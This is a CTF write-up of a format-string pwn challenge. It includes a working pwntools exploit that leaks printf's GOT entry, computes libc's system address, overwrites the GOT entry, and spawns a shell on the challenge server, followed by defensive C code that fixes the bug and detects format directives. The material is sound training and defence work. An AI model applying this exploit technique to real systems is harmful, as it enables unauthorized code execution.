[BUUCTF-pwn] wdb_2018_2nd_easyfmt
A simple format-string exploitation problem. The steps are:
- Leak a GOT entry to recover the libc base address
- Work out the real address of system
- Overwrite printf's GOT entry with the address of system
- Send "/bin/sh"
Exploit:

```python
from pwn import *
from LibcSearcher import *

context.log_level = "debug"
p = remote('node3.buuoj.cn', 25125)
#p = process("./wdb_2018_2nd_easyfmt")
elf = ELF("./wdb_2018_2nd_easyfmt")
printf_got = elf.got["printf"]

# Stage 1: leak the libc address stored in printf's GOT entry.
# The input buffer is the 6th printf argument, so "%6$s" dereferences
# the address placed at the start of the buffer.
payload1 = p32(printf_got) + b"%6$s"
p.sendlineafter(b"repeater?\n", payload1)
p.recv(4)                      # skip the 4 raw address bytes echoed back
printf_addr = u32(p.recv(4))   # the leaked libc pointer
print("printf_addr ---> ", hex(printf_addr))

# Stage 2: resolve the libc base and system from the leaked value.
libc = LibcSearcher("printf", printf_addr)
libcbase = printf_addr - libc.dump("printf")
system = libcbase + libc.dump("system")

# Stage 3: overwrite printf's GOT entry with system, then send "/bin/sh"
# so the next printf(buf) call becomes system("/bin/sh").
payload = fmtstr_payload(6, {printf_got: system})
p.sendline(payload)
p.sendline(b"/bin/sh\x00")
p.interactive()
```
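As an added example that is not part of the original write-up, here is the defensive side of the same bug. The challenge's source is not on the page, so the vulnerable "repeater" pattern shown in the comment is an assumed reconstruction; `repeater_safe` and `has_format_directive` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Assumed shape of the vulnerable repeater: the user's line is used
 * directly as the format string, so directives such as "%6$s" (read)
 * or "%n" (write) are interpreted instead of echoed.
 *
 *     void repeater_vuln(const char *line) { printf(line); }
 *
 * gcc/clang warn about this with -Wformat-security. */

/* Fixed version: the input is always passed as an argument, never as
 * the format. It formats into `out` (size n) and returns the number
 * of bytes that would have been written, so the behaviour is testable. */
int repeater_safe(const char *line, char *out, size_t n) {
    return snprintf(out, n, "%s", line);
}

/* Detection helper for logging or alerting: returns 1 if `s` contains a
 * conversion directive, i.e. a '%' that is not the literal "%%". Input
 * like "%6$s" trips it; "100%%" and plain text do not. */
int has_format_directive(const char *s) {
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* "%%" is just a percent sign */
            s++;
            continue;
        }
        return 1;
    }
    return 0;
}
```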
Tags: wdb, BUUCTF, easyfmt, addr, system, 2nd, printf, got. Source: https://blog.csdn.net/Y_peak/article/details/114924318